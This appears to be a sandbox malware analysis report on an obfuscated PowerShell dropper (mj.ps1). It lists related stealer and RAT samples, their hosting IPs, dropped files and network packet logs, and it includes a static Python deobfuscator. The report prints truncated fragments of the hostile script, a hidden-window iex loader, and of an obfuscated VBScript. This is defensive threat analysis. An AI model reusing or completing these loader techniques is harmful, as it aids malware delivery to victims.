HETZNER-ASDE | rukT6hBo6P.exe | malicious | Phemedrone Stealer | 49.12.121.47
HETZNER-ASDE | o26qobnkQI.exe | malicious | Vidar | 159.69.102.165
HETZNER-ASDE | https://ammyy.com/en/downloads.html | malicious | Flawedammyy | 136.243.18.118
HETZNER-ASDE | Advertising Agreement for Youtube Cooperation.scr | malicious | LummaC Stealer | 148.251.0.164
SERVERPLAN-ASIT | ni.ps1 | malicious | Unknown | 93.95.216.175
SERVERPLAN-ASIT | untrippingvT.ps1 | malicious | Unknown | 46.254.34.201
SERVERPLAN-ASIT | yT6gJFN0SR.lnk | malicious | Unknown | 46.254.34.201
SERVERPLAN-ASIT | mX3IqRiuFo.lnk | malicious | Unknown | 46.254.34.201
SERVERPLAN-ASIT | 6K2g0GMmIE.lnk | malicious | Unknown | 46.254.34.201
SERVERPLAN-ASIT | G9eWTvswoH.lnk | malicious | Unknown | 46.254.34.201
SERVERPLAN-ASIT | la.bot.mips.elf | malicious | Unknown | 193.70.147.14
SERVERPLAN-ASIT | Ordine Electricas BC Corp PO EDC0969388.bat | malicious | GuLoader | 185.81.4.143
SERVERPLAN-ASIT | Play_VM-Now(Gdunphy)CQDM.htm | malicious | Unknown | 93.95.216.8
SERVERPLAN-ASIT | Steel Dynamics.pdf | malicious | Unknown | 93.95.216.8
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | ni.ps1 | malicious | Unknown | 91.193.42.13, 93.95.216.175, 148.251.114.233, 184.171.244.231
3b5074b1b5d032e5620f69f9f700ff0e | REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 91.193.42.13, 93.95.216.175, 148.251.114.233, 184.171.244.231
3b5074b1b5d032e5620f69f9f700ff0e | RFQ.exe | malicious | AgentTesla, PureLog Stealer | 91.193.42.13, 93.95.216.175, 148.251.114.233, 184.171.244.231
3b5074b1b5d032e5620f69f9f700ff0e | 31#U544a.exe | malicious | CobaltStrike | 91.193.42.13, 93.95.216.175, 148.251.114.233, 184.171.244.231
3b5074b1b5d032e5620f69f9f700ff0e | R7bv9d6gTH.dll | malicious | Unknown | 91.193.42.13, 93.95.216.175, 148.251.114.233, 184.171.244.231
3b5074b1b5d032e5620f69f9f700ff0e | Patch.exe | malicious | PureLog Stealer, XWorm | 91.193.42.13, 93.95.216.175, 148.251.114.233, 184.171.244.231
3b5074b1b5d032e5620f69f9f700ff0e | RuntimeBroker.exe | malicious | PureLog Stealer, XWorm | 91.193.42.13, 93.95.216.175, 148.251.114.233, 184.171.244.231
3b5074b1b5d032e5620f69f9f700ff0e | Qsgtknmtt.exe | malicious | Unknown | 91.193.42.13, 93.95.216.175, 148.251.114.233, 184.171.244.231
3b5074b1b5d032e5620f69f9f700ff0e | Fzcaaz.exe | malicious | Unknown | 91.193.42.13, 93.95.216.175, 148.251.114.233, 184.171.244.231
3b5074b1b5d032e5620f69f9f700ff0e | Ekyrfzxogk.exe | malicious | Unknown | 91.193.42.13, 93.95.216.175, 148.251.114.233, 184.171.244.231
                                                                          No context
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with very long lines (316), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):29287
                                                                          Entropy (8bit):5.16757071229696
                                                                          Encrypted:false
                                                                          SSDEEP:768:5Yf48SKT1nPeL9GLfqAQnS71KcNrx182u+:504lKT1P0yfqAuiNbtu+
                                                                          MD5:8DF76AF54C38D5D4C2CD9F6D18EEDF92
                                                                          SHA1:B21C95EBF34440AD8DA30F6E4FE25BADB871D61A
                                                                          SHA-256:2FD9440E21ADF91473719E9FB085F4D47A1D5AFCF02333A7F04D2A0F4D0B1C77
                                                                          SHA-512:8DBBDBC575A292890F1B1BB8AEDA916A958225B11739075B447AE7CE64774C678C45B071F0FBB91460BB218409E026ECFCF05740DAD8EB059B773C990D57FB09
                                                                          Malicious:true
                                                                          Reputation:low
                                                                          Preview:......Function Seasoning(Ambrain)......Publikummetbatfowl = Mid(MidB(Command, 44, 213),21,25)....Seasoning = ChrW(Ambrain)....Opskreknivsplid = Command ......End Function ....elektroingenirerne = LenB("Sardinieren") ..elektroingenirerne = elektroingenirerne xor clng(6932161) ...... ..Sorting137 = 0.... ..Pinligstes= array(65+5+0,69,77,59,72,73,62,59,66,66)......Kopvisdislocatedavic = Log(Len("Frihedsbevgelserne"))....Private Const Kbesum = 49485..Private Const Cornbird = 16348..Private Const Nyderes = "Pandaer verificative133 knopskydning,"..Private Const Terrorize = "Postansvarlige skjorternes"..Private Const Danseorkesteret = "Myndigstes150 exculpate trykkeriers puromucous"..Private Const Unignorant = &HF76C..Private Const Iodinophilous = -9045..Private Const Polyautography = 22989..Private Const Divisibly = -6735..Private Const Takeups = &H8FE6..Private Const Inductance = &H59DF..Private Const Thorax64 = -13300..Private Const Forkiness = &H96C8..Private Const Kondensatorers147 =
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):11608
                                                                          Entropy (8bit):4.890472898059848
                                                                          Encrypted:false
                                                                          SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                          MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                          SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                          SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                          SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                          Malicious:false
                                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):1.1940658735648508
                                                                          Encrypted:false
                                                                          SSDEEP:3:NlllulvyWtlz:NllUqWtl
                                                                          MD5:6E6C2B510FF8665DFAFB81CA42E7E6D8
                                                                          SHA1:5D032FB8A53A7635CBB67510A02A77C0E871FBDA
                                                                          SHA-256:87BF5AB544BC2AC5EB8AB30EB47E267D0C409C69B1C777EFAB58C18D658684C4
                                                                          SHA-512:0C59743514C9D5A0C906321CB467D06FF462BFBF4D2428D24C68DD0A14EE09700E5D38ADBD71250A8D59099BD54CAD2B8DD553A7F6662682E75ADD2432113ECD
                                                                          Malicious:false
                                                                          Preview:@...e.................................>.w............@..........
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):6221
                                                                          Entropy (8bit):3.7221055784827666
                                                                          Encrypted:false
                                                                          SSDEEP:96:Va+dCNNZGykvhkvCCt8HYaqcHeeYaqpHe6:VtcNUu8HYFeYe6
                                                                          MD5:C94346A7632B115924765761AC4F6526
                                                                          SHA1:1E82A6F1EE4627729E9D3A204AB72803CDA20734
                                                                          SHA-256:63256025A22B20D26E0C23B318060ABFF67CF18A7C501FC78BFC3EECB87B9D01
                                                                          SHA-512:F51A84AA20A5C68442B4548D52962A4915109F94BA48E6168D696DE5F029B7EA3AAD72F6E6E1301E9E96EE5E7D5F0B22F2931DC4E3BEEB9252038BCE2144C54C
                                                                          Malicious:false
                                                                          Preview:...................................FL..................F.".. ...]...z...$.V..F..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z.... ...F....p..F......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.V.Y.L..........................B...A.p.p.D.a.t.a...B.V.1......Y.L..Roaming.@......EW.V.Y.L............................:.R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.V.Y.L..............................M.i.c.r.o.s.o.f.t.....V.1.....EW'Y..Windows.@......EW.V.Y.L............................`.W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.V.Y.L....................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.V.Y.L....................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.VEW.V..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.V.Y.L................
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):6221
                                                                          Entropy (8bit):3.7221055784827666
                                                                          Encrypted:false
                                                                          SSDEEP:96:Va+dCNNZGykvhkvCCt8HYaqcHeeYaqpHe6:VtcNUu8HYFeYe6
                                                                          MD5:C94346A7632B115924765761AC4F6526
                                                                          SHA1:1E82A6F1EE4627729E9D3A204AB72803CDA20734
                                                                          SHA-256:63256025A22B20D26E0C23B318060ABFF67CF18A7C501FC78BFC3EECB87B9D01
                                                                          SHA-512:F51A84AA20A5C68442B4548D52962A4915109F94BA48E6168D696DE5F029B7EA3AAD72F6E6E1301E9E96EE5E7D5F0B22F2931DC4E3BEEB9252038BCE2144C54C
                                                                          Malicious:false
                                                                          Preview:...................................FL..................F.".. ...]...z...$.V..F..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z.... ...F....p..F......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.V.Y.L..........................B...A.p.p.D.a.t.a...B.V.1......Y.L..Roaming.@......EW.V.Y.L............................:.R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.V.Y.L..............................M.i.c.r.o.s.o.f.t.....V.1.....EW'Y..Windows.@......EW.V.Y.L............................`.W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.V.Y.L....................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.V.Y.L....................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.VEW.V..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.V.Y.L................
                                                                          File type:ASCII text, with very long lines (825), with no line terminators
                                                                          Entropy (8bit):5.31863986755126
                                                                          TrID:
                                                                            File name:mj.ps1
                                                                            File size:825 bytes
                                                                            MD5:60d7208fe8e8ac62c560b76fcf8a3bce
                                                                            SHA1:50220e1eed46cd7cce80a8f1e4aaf38619a6f2c7
                                                                            SHA256:42306fd8ea8eea5b9eddb11782f5eb51d69eebfd63da36f2b03d749e649e3939
                                                                            SHA512:c5c72b8cd516eeedf89cc6f2270001651176c11e8513d9fb1a4219a7065ac39fa272ab6f76902901a562befd4f89db84ee7a8fda5f0f9ba6227c5045ea1632cd
                                                                            SSDEEP:24:XVeIZ8hIVIZvjWIFBReaLJmz287CQWAa6KzmtlKS/zo+em:leIzVINKIFBReqmzz7Kzmt4yoi
                                                                            TLSH:5E011205A166D7E34640B59114C25B3E3177D70A60EE44F371F4421725EC6780ED3D3B
                                                                            File Content Preview:powershell -win hidden $xeqoc9=iex($('[Environment]::GetEs3ss'''.Replace('s3s','nvironmentVariable(''public'') + ''\\f170vy.vb')));$flol=iex($('[Environment]::GetEs3ss'''.Replace('s3s','nvironmentVariable(''public'') + ''\\p2q.vb')));function getit([strin
                                                                            Icon Hash:3270d6baae77db44
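The File Content Preview above shows the sample's string-building trick: each `iex($(...))` argument is a single-quoted literal containing a placeholder (`s3s`) that `.Replace()` swaps for the real text, so the string `[Environment]::GetEnvironmentVariable('public') + '\\f170vy.vbs'` never appears in the file (note the trailing `s'` after the placeholder, which completes the `.vbs` extension), and `iex` then evaluates the rebuilt expression into a path under the Public folder. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it folds the Replace chain statically, without executing any of the script, and resolves the environment variable against an assumed default (`C:\Users\Public`, which the page does not state). Its only input is the two statements visible in the truncated preview; the rest of the script (`function getit(...)`) is not recoverable from the page.

```python
import ntpath
import re

# Constructed sample: the first two statements of the File Content Preview,
# copied as the report prints them (the report truncates the preview, so the
# remainder of the script is not available here). Two backslashes are literal.
SAMPLE = (
    "powershell -win hidden "
    "$xeqoc9=iex($('[Environment]::GetEs3ss'''.Replace('s3s','nvironmentVariable(''public'') + ''\\\\f170vy.vb')));"
    "$flol=iex($('[Environment]::GetEs3ss'''.Replace('s3s','nvironmentVariable(''public'') + ''\\\\p2q.vb')));"
)

# Assumed value of the 'public' environment variable on a default Windows
# install; the sandbox's actual value is not shown on the page.
ASSUMED_ENV = {"public": r"C:\Users\Public"}

# PowerShell single-quoted literal: no escapes at all except '' for one quote.
SQ = r"'((?:[^']|'')*)'"
IEX_ASSIGN = re.compile(r"\$(\w+)\s*=\s*iex\(\$\(", re.IGNORECASE)
ENV_CONCAT = re.compile(
    r"\[Environment\]::GetEnvironmentVariable\(" + SQ + r"\)\s*\+\s*" + SQ,
    re.IGNORECASE,
)


def unescape(raw):
    return raw.replace("''", "'")


def parse_literal(s, i):
    """Parse a single-quoted literal starting at s[i]; return (value, next index)."""
    if i >= len(s) or s[i] != "'":
        raise ValueError("expected a single-quoted literal at offset %d" % i)
    i += 1
    out = []
    while i < len(s):
        if s[i] == "'":
            if s[i + 1:i + 2] == "'":   # '' inside the literal is one quote
                out.append("'")
                i += 2
                continue
            return "".join(out), i + 1
        out.append(s[i])
        i += 1
    raise ValueError("unterminated literal")


def skip_ws(s, i):
    while i < len(s) and s[i].isspace():
        i += 1
    return i


def fold_replace_chain(s, i):
    """Statically evaluate  'lit'.Replace('a','b').Replace(...)  starting at s[i].

    Nothing is executed: the chain is folded with str.replace, which behaves
    like .NET String.Replace for plain (non-regex) string arguments."""
    value, i = parse_literal(s, i)
    while True:
        j = skip_ws(s, i)
        if s[j:j + 9].lower() != ".replace(":
            return value, i
        i = skip_ws(s, j + 9)
        old, i = parse_literal(s, i)
        i = skip_ws(s, i)
        if s[i:i + 1] != ",":
            raise ValueError("expected ',' in Replace() at offset %d" % i)
        i = skip_ws(s, i + 1)
        new, i = parse_literal(s, i)
        i = skip_ws(s, i)
        if s[i:i + 1] != ")":
            raise ValueError("expected ')' in Replace() at offset %d" % i)
        i += 1
        value = value.replace(old, new)


def extract_iex_payloads(script):
    """Return [(variable, rebuilt expression)] for every  $var=iex($( ... ))  found."""
    found = []
    for m in IEX_ASSIGN.finditer(script):
        expr, _ = fold_replace_chain(script, m.end())
        found.append((m.group(1), expr))
    return found


def resolve_path(expr):
    """Resolve  [Environment]::GetEnvironmentVariable('x') + '...'  via ASSUMED_ENV.

    Returns None for any other expression shape, so unknown code is never run."""
    m = ENV_CONCAT.fullmatch(expr)
    if m is None:
        return None
    base = ASSUMED_ENV.get(unescape(m.group(1)).lower())
    if base is None:
        return None
    return ntpath.normpath(base + unescape(m.group(2)))


if __name__ == "__main__":
    for var, expr in extract_iex_payloads(SAMPLE):
        print("$%s = %s" % (var, expr))
        print("   -> %s" % resolve_path(expr))
```

`resolve_path` deliberately accepts only the one expression shape seen in the preview; anything else returns `None` rather than being handed to an evaluator, which is the property that separates a static deobfuscator from re-running the dropper. The two rebuilt paths name the `.vbs` files the script goes on to use, which is consistent with the WScript dropper and "Wscript starts Powershell" signatures in the report summary.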
Timestamp                           Source Port  Dest Port  Source IP      Dest IP
Dec 5, 2024 10:39:26.123281002 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:26.123326063 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:26.123389006 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:26.134675026 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:26.134701014 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:27.571166039 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:27.571259975 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:27.574179888 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:27.574193001 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:27.574438095 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:27.581166029 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:27.627329111 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.299432039 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.299465895 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.299566031 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:28.299578905 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.350266933 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:28.402715921 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.402730942 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.402868032 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:28.402875900 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.444030046 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:28.496088028 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.496098042 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.496128082 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.496215105 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:28.496247053 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:28.529500008 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.529508114 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.529596090 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:28.529602051 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.554815054 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.554862976 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.554929018 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:28.554929018 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:28.554936886 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.599365950 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.599390030 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.599503040 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:28.599512100 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.599536896 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:28.647161961 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:28.682097912 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.682226896 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.682250023 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.682275057 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:28.682431936 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:28.682436943 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.697982073 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.698052883 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.698091984 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.698096991 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:28.698102951 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.698108912 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:28.698180914 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:28.716289043 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.716298103 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.716367960 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:28.716372967 CET  443          49728      93.95.216.175  192.168.2.11
Dec 5, 2024 10:39:28.721088886 CET  49728        443        192.168.2.11   93.95.216.175
Dec 5, 2024 10:39:29.081373930 CET  49734        443        192.168.2.11   91.193.42.13
Dec 5, 2024 10:39:29.081410885 CET  443          49734      91.193.42.13   192.168.2.11
Dec 5, 2024 10:39:29.081495047 CET  49734        443        192.168.2.11   91.193.42.13
Dec 5, 2024 10:39:29.081760883 CET  49734        443        192.168.2.11   91.193.42.13
Dec 5, 2024 10:39:29.081777096 CET  443          49734      91.193.42.13   192.168.2.11
Dec 5, 2024 10:39:30.536192894 CET  443          49734      91.193.42.13   192.168.2.11
Dec 5, 2024 10:39:30.536428928 CET  49734        443        192.168.2.11   91.193.42.13
Dec 5, 2024 10:39:30.538522959 CET  49734        443        192.168.2.11   91.193.42.13
Dec 5, 2024 10:39:30.538528919 CET  443          49734      91.193.42.13   192.168.2.11
Dec 5, 2024 10:39:30.538794994 CET  443          49734      91.193.42.13   192.168.2.11
Dec 5, 2024 10:39:30.542818069 CET  49734        443        192.168.2.11   91.193.42.13
Dec 5, 2024 10:39:30.583332062 CET  443          49734      91.193.42.13   192.168.2.11
